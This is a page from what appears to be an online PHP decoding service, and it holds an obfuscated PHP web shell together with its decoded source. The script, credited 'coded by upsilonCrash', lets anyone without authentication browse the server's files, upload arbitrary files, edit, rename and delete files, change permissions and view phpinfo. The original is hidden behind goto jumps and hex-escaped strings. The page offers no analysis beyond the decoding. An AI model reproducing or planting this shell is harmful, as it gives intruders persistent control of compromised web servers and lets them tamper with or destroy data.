Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto Rgq3v; Pzuo1: echo "\12\x3c\x73\164\171\x6c\145\76\12\40\40\40\x20\142\157\x64..

Decoded Output download

<?php
 goto Rgq3v; Pzuo1: echo "
<style>
    body {
        color: Gray;\xa        background: #353535;
        font-weight: Bold;
        font-family: Arial;\xa        font-size: 14px;\xa    }\xa
    input[id=one] {\xa        background: Transparent;
        color: Gray;
        font-weight: Bold;\xa        border: #353535 1px solid;
    }
\xa    input[id=textinput] {
        border: 1px #353535 solid;\xa        background: #353535;\xa        color: Gray;
        font-weight: Bold;\xa        width: 50%;
    }\xa\xa    input[type=submit] {\xa        background: Transparent;\xa        color: Gray;
        font-weight: Bold;\xa        border: #353535 1px solid;\xa    }\xa\xa    input[type=file] , [id=three] {\xa        width: 30%;
        border: 1px Gray solid;
        border-radius: 10px;\xa        background: #353535;\xa        color: Gray;
    }

    input[id=two] {\xa        margin-left: 70px;
    }\xa
    a {\xa        text-decoration: none;
        color: Gray;\xa    }
\xa    table {\xa        font-weight: Bold;
    }\xa\xa    textarea {\xa        width: 90%;
        height: 50%;
    }\xa
    .iclass {
        margin-left: 40px;\xa    }\xa</style>\xa\xa"; goto dt2VG; ooGOr: if (isset($_POST["upload"])) { echo "
    upload to : <input type='text' autocomplete='off' id='textinput' name='uptopath' value='" . $path . $slash . "' width='100px'><br>
    <input type='file' name='file'><hr color='Gray'><center><a href='?path=" . $_GET["path"] . "'>cancel</a>
    <input type='submit' name='move_upload' value='upload' id='two'>\xa    "; die; } goto p2LzQ; nSCuk: if (is_dir($path)) { if ($path !== "/") { $slash = "/"; } else { $slash = ''; } } else { $checkslash = substr($path, 2); if (is_dir($checkslash)) { if ($checkslash !== "/") { $slash = "/"; } else { $slash = ''; } } else { if (is_file($checkslash)) { if ($checkslash !== "/") { $slash = "/"; } else { $slash = ''; } } } } goto KcYvS; Zackz: $scanPath = array_diff($scanPath, array(".", "..")); goto fYM4d; JJbg1: for ($i = 0; $i < count($scanPath); $i++) { $iota = $scanPath[$i]; $pathType = mime_content_type($path . $slash . $iota); $pathType = explode("/", $pathType); $sizeA = filesize($path . $slash . $iota); $filesize = $sizeA; $sizeks = "B"; if ($sizeA > 1024) { $filesize = round($sizeA / 1024); $sizeks = "KB"; } if ($sizeA > 1024 * 1024) { $filesize = round($sizeA / 1024 / 1024); $sizeks = "MB"; } if ($sizeA > 1024 * 1024 * 1024) { $filesize = round($sizeA / 1024 / 1024 / 1024); $sizeks = "GB"; } if ($sizeA > 1024 * 1024 * 1024 * 1024) { $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024); $sizeks = "TB"; } if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024) { $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024); $sizeks = "PB"; } if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024 * 1024) { $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024 / 1024); $sizeks = "EB"; } if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024 * 1024 * 1024) { $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024 / 1024 / 1024); $sizeks = "ZB"; } if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024 * 1024 * 1024 * 1024) { $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024 / 1024 / 1024 / 1024); $sizeks = "YB"; } $result = filemtime($path . $slash . $iota); $result = getdate($result); $one = strlen($result["mday"]); $two = strlen($result["mon"]); $three = strlen($result["year"]); $four = strlen($result["hours"]); $five = strlen($result["minutes"]); if ($one == "1") { $result["mday"] = "0" . $result["mday"]; } if ($two == "1") { $result["mon"] = "0" . $result["mon"]; } if ($three == "1") { $result["year"] = "0" . $result["year"]; } if ($four == "1") { $result["hours"] = "0" . $result["hours"]; } if ($five == "1") { $result["minutes"] = "0" . $result["minutes"]; } $result = $result["mday"] . "-" . $result["mon"] . "-" . $result["year"] . " " . $result["hours"] . ":" . $result["minutes"]; if ($pathType[0] == "text") { echo "<tr><td width='2%'><div class='iclass'>F</div></td><td width='50%'>| <input type='text' readonly='readonly' id='one' value='" . $iota . "' style='width: 50%'></td>\xa        <td width='10%'><center>" . $filesize . $sizeks . "</center></td><td width='20%'><center>" . $result . "</center></td>
        <td width='5%'><center><a title='chmod " . $iota . "' href='?path=" . base64_encode("#C" . $path . $slash . $iota) . "'>" . substr(sprintf("%o", fileperms($path . $slash . $iota)), -4) . "</a></center></td>
        <td style='width: 5%'><center><a title='edit " . $iota . "' href='?path=" . base64_encode("#E" . $path . $slash . $iota) . "'>E</a>
        <a title='rename " . $iota . "' href='?path=" . base64_encode("#R" . $path . $slash . $iota) . "'>R</a>
        <a title='delete " . $iota . "' href='?path=" . base64_encode("#D" . $path . $slash . $iota) . "'>D</a></center></td>
        </tr>"; } else { if ($pathType[0] == "application") { echo "<tr><td width='2%'><div class='iclass'>F</div></td><td width='50%'>| <input type='text' readonly='readonly' id='one' value='" . $iota . "' style='width: 50%'></td>
            <td width='10%'><center>" . $filesize . $sizeks . "</center></td><td width='20%'><center>" . $result . "</center></td>\xa            <td width='5%'><center><a title='chmod " . $iota . "' href='?path=" . base64_encode("#C" . $path . $slash . $iota) . "'>" . substr(sprintf("%o", fileperms($path . $slash . $iota)), -4) . "</a></center></td>
            <td style='width: 5%'><center><a title='edit " . $iota . "' href='?path=" . base64_encode("#E" . $path . $slash . $iota) . "'>E</a>
            <a title='rename " . $iota . "' href='?path=" . base64_encode("#R" . $path . $slash . $iota) . "'>R</a>
            <a title='delete " . $iota . "' href='?path=" . base64_encode("#D" . $path . $slash . $iota) . "'>D</a></center></td>\xa            </tr>"; } } } goto RuHaG; orkb_: for ($i = 0; $i < count($scanPath); $i++) { $iota = $scanPath[$i]; if (is_dir($path . $slash . $iota)) { $result = filemtime($path . $slash . $iota); $result = getdate($result); $one = strlen($result["mday"]); $two = strlen($result["mon"]); $three = strlen($result["year"]); $four = strlen($result["hours"]); $five = strlen($result["minutes"]); if ($one == "1") { $result["mday"] = "0" . $result["mday"]; } if ($two == "1") { $result["mon"] = "0" . $result["mon"]; } if ($three == "1") { $result["year"] = "0" . $result["year"]; } if ($four == "1") { $result["hours"] = "0" . $result["hours"]; } if ($five == "1") { $result["minutes"] = "0" . $result["minutes"]; } $result = $result["mday"] . "-" . $result["mon"] . "-" . $result["year"] . " " . $result["hours"] . ":" . $result["minutes"]; echo "<tr><td width='2%'><div class='iclass'>D</div></td><td width='50%'>| <input type='text' readonly='readonly' id='one' value='" . $iota . "' style='width: 50%'></td>\xa        <td width='10%'><center>-</center></td><td width='20%'><center>" . $result . "</center></td>\xa        <td width='5%'><center><a title='chmod " . $iota . "' href='?path=" . base64_encode("#C" . $path . $slash . $iota) . "'>" . substr(sprintf("%o", fileperms($path . $slash . $iota)), -4) . "</a></center></td>\xa        <td style='width: 5%'><center><a title='open " . $iota . "' href='?path=" . base64_encode($path . $slash . $iota) . "'>O</a>\xa        <a title='rename " . $iota . "' href='?path=" . base64_encode("#R" . $path . $slash . $iota) . "'>R</a>
        <a title='delete " . $iota . "' href='?path=" . base64_encode("#D" . $path . $slash . $iota) . "'>D</a></center></td>\xa        </tr>"; } } goto JJbg1; P70p5: if (isset($_POST["move_upload"])) { if (strpos($_POST["uptopath"], "..") !== FALSE) { echo "\xa        <script>\xa        alert('failed');\xa        document.location.href = '?path=" . $_GET["path"] . "';\xa        </script>
        "; } $fileName = $_FILES["file"]["name"]; $tmpName = $_FILES["file"]["tmp_name"]; $upload = $_POST["uptopath"] . $slash . $fileName; if (is_file($upload)) { echo "
        <script>
        alert('file name already exists');\xa        document.location.href = '?path=" . $_GET["path"] . "';\xa        </script>\xa        "; } else { if (move_uploaded_file($tmpName, $upload)) { echo "\xa            <script>\xa            alert('successfully');\xa            document.location.href = '?path=" . $_GET["path"] . "';
            </script>
            "; } else { echo "\xa            <script>\xa            alert('failed');
            document.location.href = '?path=" . $_GET["path"] . "';
            </script>\xa            "; } } } goto SWgHB; eDuok: if (substr($path, 0, 2) == "#D") { $delta = substr($path, 2); $back = dirname($delta); if (isset($_POST["submit_delete"])) { if (is_dir($delta)) { if (rmdir($delta)) { echo "\xa                <script>\xa                alert('successfully');\xa                document.location.href = '?path=" . base64_encode($back) . "';\xa                </script>
                "; } else { echo "
                <script>\xa                alert('failed');\xa                document.location.href = '?path=" . base64_encode($back) . "';\xa                </script>\xa                "; } } else { if (unlink($delta)) { echo "
                <script>\xa                alert('successfully');
                document.location.href = '?path=" . base64_encode($back) . "';
                </script>
                "; } else { echo "\xa                <script>\xa                alert('failed');
                document.location.href = '?path=" . base64_encode($back) . "';\xa                </script>
                "; } } } if (is_dir($delta)) { $cat = "folder"; } else { $cat = "file"; } echo "path : <input type='text' readonly='readonly' value='" . $delta . "' id='one' style='width: 80%;'><br>
    name : <input type='text' readonly='readonly' value='" . basename($delta) . "' id='one' style='width: 80%;'><br>\xa    are you sure to permanently delete this " . $cat . "?<hr color='Gray'><center>\xa    <a href='?path=" . base64_encode($back) . "'>no</a><input type='submit' name='submit_delete' value='yes' id='two'>
    "; die; } goto aRlp5; p2LzQ: if (isset($_POST["create_folder"])) { echo "
    create on : <input type='text' autocomplete='off' id='textinput' name='pathfolder' value='" . $path . $slash . "' width='100px'><br>\xa    <input type='text' autocomplete='off' name='foldername' id='three' placeholder='folder name'><hr color='Gray'><center><a href='?path=" . $_GET["path"] . "'>cancel</a>\xa    <input type='submit' name='crf' value='create' id='two'>\xa    "; die; } goto fq9Qh; dSPjL: echo "</table><hr color='Gray'><center>coded by upsilonCrash</form>"; goto PR0tu; JZ6YT: echo "<pre><center>
.d8888b  888  888 88888b.   .d88b.  888  888 888  888
88K      888  888 888 '88b d88P'88b 888  888 `Y8bd8P'\xa'Y8888b. 888  888 888  888 888  888 888  888   X88K  
     X88 Y88b 888 888  888 Y88b 888 Y88b 888 .d8''8b.
d88888P'  'Y88888 888  888  'Y88888  'Y88888 888  888\xa                                888                  \xa                           Y8b d88P                  \xa                            'Y88P'                   
</center></pre>"; goto cfpHX; Tvnac: if (isset($_POST["crfl"])) { if (strpos($_POST["pathfile"], "..") == FALSE) { if (is_dir($_POST["pathfile"])) { $slashcheck = explode("/", $_POST["pathfile"]); $slashcheck = implode("/", $slashcheck) . $slash; if (strpos($_POST["filename"], "/") == FALSE) { $filePath9 = $slashcheck . $_POST["filename"]; if (!is_file($filePath9)) { $createFile = fopen($filePath9, "x"); if ($createFile) { echo "\xa                        <script>\xa                        alert('successfully');
                        document.location.href = '?path=" . $_GET["path"] . "';
                        </script>\xa                        "; } else { echo "
                        <script>
                        alert('failed');\xa                        document.location.href = '?path=" . $_GET["path"] . "';
                        </script>
                        "; } } else { echo "\xa                    <script>\xa                    alert('file name already exists');
                    document.location.href = '?path=" . $_GET["path"] . "';\xa                    </script>
                    "; } } else { echo "
                <script>
                alert('use a different name');\xa                document.location.href = '?path=" . $_GET["path"] . "';
                </script>\xa                "; } } else { echo "\xa            <script>
            alert('directory not found');\xa            document.location.href = '?path=" . $_GET["path"] . "';
            </script>\xa            "; } } else { echo "\xa        <script>
        alert('failed');
        document.location.href = '?path=" . $_GET["path"] . "';\xa        </script>\xa        "; } } goto VoETZ; aRlp5: if (substr($path, 0, 2) == "#C") { $home = dirname(substr($path, 2)); $home = base64_encode($home); $perms = substr(sprintf("%o", fileperms(substr($path, 2))), -3); $chv = fileperms(substr($path, 2)); $a = $chv & 256 ? " checked" : ''; $b = $chv & 32 ? " checked" : ''; $c = $chv & 4 ? " checked" : ''; $d = $chv & 128 ? " checked" : ''; $e = $chv & 16 ? " checked" : ''; $f = $chv & 2 ? " checked" : ''; $g = $chv & 64 ? " checked" : ''; $h = $chv & 8 ? " checked" : ''; $i = $chv & 1 ? " checked" : ''; if (isset($_POST["submit_chmod"])) { $chmode = 0; if (!empty($_POST["ra"])) { $chmode |= 256; } if (!empty($_POST["wa"])) { $chmode |= 128; } if (!empty($_POST["ea"])) { $chmode |= 64; } if (!empty($_POST["rb"])) { $chmode |= 32; } if (!empty($_POST["wb"])) { $chmode |= 16; } if (!empty($_POST["eb"])) { $chmode |= 8; } if (!empty($_POST["rc"])) { $chmode |= 4; } if (!empty($_POST["wc"])) { $chmode |= 2; } if (!empty($_POST["ec"])) { $chmode |= 1; } if (chmod(substr($path, 2), $chmode)) { echo "
            <script>\xa            alert('successfully');\xa            document.location.href = '?path=" . $home . "';\xa            </script>
            "; } else { echo "\xa            <script>\xa            alert('failed');\xa            document.location.href = '?path=" . $home . "';\xa            </script>\xa            "; } } echo "
        <hr color='Gray'><form action='' method='post'>\xa        <input type='text' readonly='readonly' value='" . substr($path, 2) . "' id='one' style='width: 100%'>
        <hr color='Gray'>
        <table width='100%'>
            <tr>
                <th class='chmodd'>Permissions</th>
                <th class='chmodd'>Owner</th>
                <th class='chmodd'>Group</th>\xa                <th class='chmodd'>Other</th>\xa            </tr>\xa            <tr>\xa                <td>Read</td>
                <td><center><input type='checkbox' name='ra' value='1' " . $a . "></center></td>
                <td><center><input type='checkbox' name='rb' value='1' " . $b . "></center></td>\xa                <td><center><input type='checkbox' name='rc' value='1' " . $c . "></center></td>\xa            </tr>\xa            <tr>
                <td>Write</td>\xa                <td><center><input type='checkbox' name='wa' value='1' " . $d . "></center></td>\xa                <td><center><input type='checkbox' name='wb' value='1' " . $e . "></center></td>\xa                <td><center><input type='checkbox' name='wc' value='1' " . $f . "></center></td>
            </tr>
            <tr>\xa                <td>Execute</td>
                <td><center><input type='checkbox' name='ea' value='1' " . $g . "></center></td>
                <td><center><input type='checkbox' name='eb' value='1' " . $h . "></center></td>
                <td><center><input type='checkbox' name='ec' value='1' " . $i . "></center></td>
            </tr>\xa        </table><hr color='Gray'>\xa        <center><a href='?path=" . $home . "'>cancel</a>
        <input type='submit' name='submit_chmod' value='change' id='two'></center>\xa    "; die; } goto ooGOr; fYM4d: $scanPath = array_values($scanPath); goto orkb_; SWgHB: if (isset($_POST["crf"])) { if (is_dir($_POST["pathfolder"])) { if (strpos($_POST["pathfolder"], "..") !== FALSE) { echo "\xa            <script>
            alert('failed');
            document.location.href = '?path=" . $_GET["path"] . "';
            </script>\xa            "; } if (strpos($_POST["foldername"], "/") !== FALSE) { echo "\xa            <script>\xa            alert('use a different name');\xa            document.location.href = '?path=" . $_GET["path"] . "';\xa            </script>\xa            "; } else { $o2 = explode("/", $_POST["pathfolder"]); $o2 = implode("/", $o2); $o2 = $o2 . $slash . $_POST["foldername"]; if (!is_dir($o2)) { if (mkdir($o2)) { echo "\xa                    <script>\xa                    alert('successfully');
                    document.location.href = '?path=" . $_GET["path"] . "';\xa                    </script>
                    "; } else { echo "
                    <script>\xa                    alert('failed');
                    document.location.href = '?path=" . $_GET["path"] . "';
                    </script>
                    "; } } else { echo "\xa                <script>
                alert('folder name alredy exists');
                document.location.href = '?path=" . $_GET["path"] . "';
                </script>
                "; } } } else { echo "
        <script>
        alert('directory not found');
        document.location.href = '?path=" . $_GET["path"] . "';\xa        </script>\xa        "; } } goto Tvnac; Rgq3v: error_reporting(0); goto Pzuo1; cfpHX: $path = base64_decode($_GET["path"]); goto nSCuk; w9eHE: if ($path !== "/") { $alpha = dirname($path); echo "<tr><td width='2%'><div class='iclass'><a href='?path=" . base64_encode($alpha) . "'>..</a></div></td></tr>"; } goto WZ2wP; RuHaG: for ($i = 0; $i < count($scanPath); $i++) { $iota = $scanPath[$i]; $pathType = mime_content_type($path . $slash . $iota); $pathType = explode("/", $pathType); if ($pathType[0] !== "application") { if ($pathType[0] !== "text") { if (is_file($path . $slash . $iota)) { $sizeA = filesize($path . $slash . $iota); $filesize = $sizeA; $sizeks = "B"; if ($sizeA > 1024) { $filesize = round($sizeA / 1024); $sizeks = "KB"; } if ($sizeA > 1024 * 1024) { $filesize = round($sizeA / 1024 / 1024); $sizeks = "MB"; } if ($sizeA > 1024 * 1024 * 1024) { $filesize = round($sizeA / 1024 / 1024 / 1024); $sizeks = "GB"; } if ($sizeA > 1024 * 1024 * 1024 * 1024) { $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024); $sizeks = "TB"; } if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024) { $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024); $sizeks = "PB"; } if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024 * 1024) { $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024 / 1024); $sizeks = "EB"; } if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024 * 1024 * 1024) { $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024 / 1024 / 1024); $sizeks = "ZB"; } if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024 * 1024 * 1024 * 1024) { $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024 / 1024 / 1024 / 1024); $sizeks = "YB"; } $result = filemtime($path . $slash . $iota); $result = getdate($result); $one = strlen($result["mday"]); $two = strlen($result["mon"]); $three = strlen($result["year"]); $four = strlen($result["hours"]); $five = strlen($result["minutes"]); if ($one == "1") { $result["mday"] = "0" . $result["mday"]; } if ($two == "1") { $result["mon"] = "0" . $result["mon"]; } if ($three == "1") { $result["year"] = "0" . $result["year"]; } if ($four == "1") { $result["hours"] = "0" . $result["hours"]; } if ($five == "1") { $result["minutes"] = "0" . $result["minutes"]; } $result = $result["mday"] . "-" . $result["mon"] . "-" . $result["year"] . " " . $result["hours"] . ":" . $result["minutes"]; echo "<tr><td width='2%'><div class='iclass'>F</div></td><td width='50%'>| <input type='text' readonly='readonly' id='one' value='" . $iota . "' style='width: 50%'></td>\xa                <td width='10%'><center>" . $filesize . $sizeks . "</center></td><td width='20%'><center>" . $result . "</center></td>
                <td width='5%'><center><a title='chmod " . $iota . "' href='?path=" . base64_encode("#C" . $path . $slash . $iota) . "'>" . substr(sprintf("%o", fileperms($path . $slash . $iota)), -4) . "</a></center></td>\xa                <td style='width: 5%'><center><a title='rename " . $iota . "' href='?path=" . base64_encode("#R" . $path . $slash . $iota) . "'>R</a>
                <a title='delete " . $iota . "' href='?path=" . base64_encode("#D" . $path . $slash . $iota) . "'>D</a></center></td></tr>"; } } } } goto dSPjL; fq9Qh: if (isset($_POST["create_file"])) { echo "
    create on : <input type='text' autocomplete='off' id='textinput' name='pathfile' value='" . $path . $slash . "' width='100px'><br>
    <input type='text' autocomplete='off' name='filename' id='three' placeholder='file name'><hr color='Gray'><center><a href='?path=" . $_GET["path"] . "'>cancel</a>
    <input type='submit' name='crfl' value='create' id='two'>
    "; die; } goto rw4O3; dt2VG: if (isset($_POST["phpinfo"])) { echo "<a href='?path=" . $_GET["path"] . "'>back</a>"; phpinfo(); die; } goto JZ6YT; jQLDO: echo "<table width='100%'>"; goto w9eHE; rw4O3: echo "
<input type='text' readonly='readonly' id='one' value='" . $path . $slash . "' style='width: 100%;'><hr color='Gray'>\xa<input type='submit' name='upload' value='upload'>
<input type='submit' name='create_folder' value='+ folder'>\xa<input type='submit' name='create_file' value='+ file'>\xa<input type='submit' name='phpinfo' value='phpinfo'>"; goto jQLDO; j33Pj: echo "<form action='' method='post' enctype='multipart/form-data'>"; goto P70p5; WZ2wP: $scanPath = scandir($path); goto Zackz; KcYvS: if (!is_dir($path)) { if (substr($path, 0, 2) == "#E") { if (!is_file(substr($path, 2))) { header("Location: ?path=" . base64_encode(__DIR__) . ''); } } else { if (substr($path, 0, 2) == "#R") { if (!is_file(substr($path, 2))) { if (!is_dir(substr($path, 2))) { header("Location: ?path=" . base64_encode(__DIR__) . ''); } } } else { if (substr($path, 0, 2) == "#D") { if (!is_file(substr($path, 2))) { if (!is_dir(substr($path, 2))) { header("Location: ?path=" . base64_encode(__DIR__) . ''); } } } else { if (substr($path, 0, 2) == "#C") { if (!is_file(substr($path, 2))) { if (!is_dir(substr($path, 2))) { header("Location: ?path=" . base64_encode(__DIR__) . ''); } } } else { header("Location: ?path=" . base64_encode(__DIR__) . ''); } } } } } goto j33Pj; Ai3T_: if (substr($path, 0, 2) == "#R") { echo "<input type='text' readonly='readonly' value='" . substr($path, 2) . "' id='one' style='width: 80%;'>"; $delta = substr($path, 2); $back = dirname($delta); if (isset($_POST["submit_rename"])) { $alphacheck = dirname($delta) . $slash . $_POST["rename"]; if (!is_dir($alphacheck)) { if (!is_file($alphacheck)) { if (rename($delta, $alphacheck)) { echo "\xa                    <script>
                    alert('successfully');\xa                    document.location.href = '?path=" . base64_encode($back) . "';\xa                    </script>
                    "; } else { echo "\xa                    <script>
                    alert('failed');
                    document.location.href = '?path=" . base64_encode($back) . "';\xa                    </script>\xa                    "; } } else { echo "\xa                <script>\xa                alert('file name alredy exists');
                document.location.href = '?path=" . base64_encode($back) . "';
                </script>\xa                "; } } else { echo "
            <script>
            alert('folder name alredy exists');\xa            document.location.href = '?path=" . base64_encode($back) . "';\xa            </script>
            "; } } echo "\xa    <input type='text' id='three' autocomplete='off' name='rename' value='" . basename($delta) . "'><hr color='Gray'><center>\xa    <a href='?path=" . base64_encode($back) . "'>cancel</a><input type='submit' name='submit_rename' value='rename' id='two'>
    "; die; } goto eDuok; VoETZ: if (substr($path, 0, 2) == "#E") { echo "<input type='text' readonly='readonly' value='" . substr($path, 2) . "' id='one' style='width: 80%;'><hr color='Gray'><center>"; $back = dirname(substr($path, 2)); if (isset($_POST["save_edit"])) { $delta = substr($path, 2); $editz = fopen($delta, "w"); if (fwrite($editz, $_POST["edit_data"])) { echo "\xa            <script>
            alert('successfully');
            document.location.href = '?path=" . base64_encode($back) . "';
            </script>\xa            "; fclose($editz); } else { echo "
            <script>\xa            alert('failed');
            document.location.href = '?path=" . base64_encode($back) . "';\xa            </script>
            "; fclose($editz); } } if (filesize(substr($path, 2)) == 0) { echo "
        <textarea name='edit_data'></textarea><hr color='Gray'><a href='?path=" . base64_encode($back) . "'>cancel</a>\xa        <input type='submit' name='save_edit' value='save' id='two'>\xa        "; } else { $textareaValue = fopen(substr($path, 2), "r"); $textareaValue = fread($textareaValue, filesize(substr($path, 2))); $textareaValue = htmlspecialchars($textareaValue); echo "
        <textarea name='edit_data'>" . $textareaValue . "</textarea>\xa        <hr color='Gray'><a href='?path=" . base64_encode($back) . "'>cancel</a><input type='submit' name='save_edit' value='save' id='two'>
        "; fclose($textareaValue); } die; } goto Ai3T_; PR0tu: ?>

Did this file decode correctly?

Original Code

<?php
 goto Rgq3v; Pzuo1: echo "\12\x3c\x73\164\171\x6c\145\76\12\40\40\40\x20\142\157\x64\x79\x20\173\12\40\40\x20\x20\x20\x20\x20\40\143\157\154\157\x72\72\x20\107\162\x61\x79\73\xa\40\x20\x20\x20\40\x20\x20\x20\x62\141\143\153\147\x72\x6f\165\x6e\144\x3a\x20\x23\x33\x35\x33\x35\63\x35\x3b\12\40\40\x20\x20\40\x20\40\x20\146\x6f\x6e\x74\x2d\x77\x65\x69\x67\150\164\72\x20\x42\157\x6c\x64\x3b\12\40\40\x20\40\40\x20\x20\x20\x66\157\x6e\164\x2d\146\141\155\x69\x6c\171\x3a\x20\x41\162\151\141\x6c\73\xa\40\40\x20\x20\40\x20\x20\40\146\157\x6e\164\55\x73\x69\x7a\145\x3a\x20\61\x34\160\170\x3b\xa\40\40\x20\x20\175\xa\12\40\40\x20\x20\151\156\160\x75\x74\x5b\151\144\75\x6f\x6e\x65\x5d\40\173\xa\x20\x20\x20\40\40\x20\40\x20\142\x61\143\153\x67\162\x6f\165\x6e\x64\72\x20\124\162\141\x6e\163\160\x61\162\145\156\x74\x3b\12\40\x20\x20\40\40\40\40\x20\143\x6f\x6c\157\x72\x3a\x20\107\162\x61\x79\x3b\12\40\x20\x20\x20\40\x20\40\x20\x66\x6f\156\x74\x2d\167\145\x69\147\150\x74\x3a\x20\x42\x6f\x6c\144\x3b\xa\x20\x20\40\x20\x20\x20\40\x20\x62\x6f\162\x64\x65\x72\x3a\40\x23\x33\65\63\65\63\x35\x20\x31\160\x78\x20\163\157\154\x69\144\x3b\12\x20\40\40\40\175\12\xa\40\x20\40\x20\x69\156\160\165\164\133\151\x64\x3d\164\145\170\x74\x69\156\160\x75\164\135\40\173\12\40\40\x20\x20\40\40\x20\40\142\x6f\x72\x64\145\162\x3a\40\61\160\170\40\43\63\x35\x33\65\x33\65\x20\x73\x6f\x6c\x69\144\73\xa\x20\x20\40\x20\x20\40\x20\x20\x62\141\143\x6b\147\162\x6f\x75\156\x64\x3a\40\43\x33\65\x33\65\x33\65\x3b\xa\x20\x20\40\x20\x20\x20\x20\x20\x63\x6f\x6c\157\x72\72\40\107\162\141\171\x3b\12\x20\x20\40\40\x20\40\40\x20\x66\157\x6e\x74\x2d\167\x65\x69\x67\x68\164\72\40\x42\157\x6c\x64\x3b\xa\40\40\40\x20\40\x20\40\x20\x77\x69\144\x74\x68\72\x20\x35\x30\45\x3b\12\40\40\x20\40\175\xa\xa\40\40\40\40\151\x6e\160\165\x74\133\164\171\160\x65\75\x73\x75\142\155\151\164\x5d\40\173\xa\40\40\x20\40\x20\x20\x20\x20\x62\141\x63\x6b\x67\162\x6f\x75\x6e\144\72\40\x54\x72\141\156\163\x70\141\162\145\156\x74\73\xa\40\40\x20\x20\40\40\40\x20\x63\157\x6c\x6f\x72\x3a\40\x47\162\141\x79\x3b\12\40\x20\x20\x20\x20\40\x20\x20\146\x6f\x6e\x74\55\167\145\151\147\150\x74\x3a\x20\x42\157\x6c\x64\x3b\xa\x20\x20\40\x20\40\x20\40\x20\142\x6f\162\x64\145\x72\x3a\40\43\x33\65\x33\x35\63\x35\40\61\x70\x78\x20\x73\x6f\x6c\x69\144\x3b\xa\x20\x20\x20\x20\x7d\xa\xa\x20\x20\x20\x20\x69\x6e\x70\165\x74\133\x74\171\x70\x65\75\146\151\154\x65\135\x20\54\x20\133\x69\144\75\164\150\162\145\x65\x5d\40\173\xa\40\x20\40\x20\40\40\x20\x20\167\x69\x64\x74\150\72\40\x33\60\x25\x3b\12\x20\40\x20\40\x20\x20\40\40\x62\157\x72\x64\x65\x72\x3a\x20\x31\160\x78\40\107\x72\141\x79\40\x73\157\154\151\144\73\12\40\x20\x20\40\40\40\x20\40\x62\x6f\162\x64\145\162\x2d\162\141\144\151\165\x73\72\40\x31\60\160\170\x3b\xa\40\40\40\x20\40\x20\40\x20\142\x61\x63\x6b\147\x72\x6f\165\x6e\x64\x3a\40\x23\x33\65\x33\65\x33\65\x3b\xa\x20\40\40\x20\x20\x20\40\x20\x63\157\x6c\157\x72\x3a\x20\107\x72\x61\171\73\12\40\40\x20\40\175\12\12\x20\40\x20\x20\x69\x6e\160\165\164\133\x69\144\75\164\167\157\x5d\x20\173\xa\40\40\x20\x20\40\x20\40\x20\x6d\141\x72\x67\x69\156\x2d\154\145\x66\x74\x3a\40\67\60\x70\x78\73\12\x20\40\x20\x20\x7d\xa\12\x20\40\40\40\x61\x20\x7b\xa\40\x20\40\x20\40\x20\x20\40\x74\145\170\164\x2d\x64\145\143\x6f\x72\141\164\151\x6f\156\72\40\x6e\157\156\145\x3b\12\40\40\40\40\40\x20\x20\40\143\x6f\x6c\157\x72\x3a\x20\x47\162\x61\171\x3b\xa\x20\x20\40\40\175\12\xa\40\40\40\40\x74\x61\x62\154\145\40\173\xa\40\40\x20\40\40\40\x20\x20\x66\157\156\164\x2d\167\145\x69\147\x68\164\x3a\x20\x42\157\154\x64\x3b\12\x20\40\40\x20\175\xa\xa\x20\x20\40\40\x74\145\x78\164\141\x72\x65\x61\40\173\xa\x20\x20\x20\40\40\x20\x20\x20\x77\x69\x64\164\x68\x3a\40\x39\x30\45\73\12\x20\x20\x20\x20\x20\40\40\x20\150\x65\151\x67\x68\x74\72\x20\x35\60\45\73\12\40\40\x20\x20\x7d\xa\12\40\x20\x20\40\56\151\x63\154\141\x73\x73\40\173\12\x20\40\40\40\40\x20\x20\40\155\x61\162\x67\x69\x6e\55\x6c\145\146\164\72\x20\x34\60\x70\170\73\xa\x20\40\x20\x20\x7d\xa\x3c\57\x73\x74\x79\154\x65\76\xa\xa"; goto dt2VG; ooGOr: if (isset($_POST["\x75\x70\154\157\x61\x64"])) { echo "\12\x20\40\x20\40\165\160\x6c\x6f\141\x64\40\x74\157\40\x3a\x20\x3c\x69\156\160\165\x74\40\x74\171\160\145\75\x27\164\x65\x78\x74\x27\40\141\165\x74\157\x63\x6f\155\x70\x6c\145\x74\145\x3d\x27\x6f\146\x66\x27\40\151\144\75\x27\164\x65\x78\164\151\x6e\160\x75\x74\x27\x20\156\141\155\x65\x3d\47\x75\160\164\x6f\160\141\x74\150\47\40\x76\141\x6c\x75\145\x3d\x27" . $path . $slash . "\47\40\x77\x69\144\164\150\x3d\47\61\60\x30\160\x78\x27\x3e\x3c\142\162\76\12\40\40\x20\x20\74\x69\x6e\x70\165\164\x20\164\171\x70\145\x3d\47\x66\151\154\x65\x27\40\156\141\155\x65\75\x27\146\151\154\145\x27\76\74\150\162\x20\x63\157\154\x6f\x72\x3d\47\x47\x72\141\171\47\76\74\143\x65\x6e\x74\x65\162\76\x3c\141\40\150\x72\145\146\75\47\x3f\x70\x61\164\x68\x3d" . $_GET["\160\x61\164\150"] . "\47\x3e\x63\141\156\x63\145\154\x3c\x2f\x61\x3e\12\40\40\x20\40\x3c\151\156\160\x75\164\40\164\x79\x70\x65\x3d\47\163\165\x62\x6d\x69\x74\47\x20\x6e\x61\155\145\x3d\47\x6d\157\166\x65\x5f\165\x70\154\x6f\x61\144\x27\x20\x76\141\x6c\165\x65\75\47\x75\160\x6c\x6f\x61\144\x27\40\x69\x64\75\47\164\x77\157\47\76\xa\x20\x20\40\x20"; die; } goto p2LzQ; 